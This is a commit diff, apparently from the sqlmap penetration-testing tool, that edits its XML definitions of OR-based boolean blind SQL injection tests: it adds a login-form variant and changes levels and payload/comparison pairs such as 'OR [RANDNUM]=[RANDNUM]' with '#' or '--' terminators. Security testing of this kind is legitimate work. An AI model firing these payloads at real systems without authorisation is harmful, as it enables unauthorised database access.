Minor improvements to OR based injections

This commit is contained in:
Bernardo Damele 2010-12-05 10:55:19 +00:00
parent 2612615978
commit 8066610217

View File

@ -411,9 +411,25 @@ Formats:
</test> </test>
<test> <test>
<title>OR boolean-based blind - WHERE clause (login)</title>
<stype>1</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<where>1</where>
<request>
<payload>OR [RANDNUM]=[RANDNUM]</payload>
<comment>#</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>OR boolean-based blind - WHERE clause</title> <title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype> <stype>1</stype>
<level>3</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
@ -428,16 +444,16 @@ Formats:
<test> <test>
<title>OR boolean-based blind - WHERE clause</title> <title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype> <stype>1</stype>
<level>3</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>2</where>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR [RANDNUM]=[RANDNUM]</comparison>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -450,13 +466,13 @@ Formats:
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>2</where>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR [RANDNUM]=[RANDNUM]</comparison>
</response> </response>
</test> </test>
<!-- End of boolean-based blind tests - WHERE clause --> <!-- End of boolean-based blind tests - WHERE clause -->